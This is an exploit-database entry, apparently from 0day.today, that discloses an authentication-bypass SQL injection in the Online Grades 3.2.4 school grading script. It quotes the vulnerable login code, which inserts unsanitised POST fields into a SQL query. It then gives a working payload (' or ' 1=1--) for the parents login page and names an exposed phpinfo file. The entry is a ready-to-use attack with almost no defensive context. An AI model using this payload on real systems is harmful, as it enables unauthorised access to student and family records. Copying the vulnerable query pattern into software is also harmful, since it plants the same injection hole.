id: 4783
date: 02/03/2009
title: Online Grades 3.2.4 (Auth Bypass) SQL Injection Vulnerability
author: x0r
cves: 

=============================================================
Online Grades 3.2.4 (Auth Bypass) SQL Injection Vulnerability
=============================================================


#########################################################################################

    [0x01] Informations: 
	Script : Online Grades 3.2.4 
	Download : http://www.onlinegrades.org 
	Vulnerability : Auth Bypass - Php Info Disclosure 
	Author : x0r 
	Website : NULL 

#########################################################################################

    [0x02] Bug: /parents/login.php 
	
	$username = $_POST['uname']; $pword = $_POST['pass']; 
	$mysql_query = "SELECT * from PARENTS where client_id = '$username' and
client_pw = '$pword';"; 

#########################################################################################

    [0x03] Exploit: 
	Exploit: [validemail] ' or ' 1=1-- 
	
	Php Info: /includes/phpinfo.php 

#########################################################################################




#  0day.today [2023-03-25]  #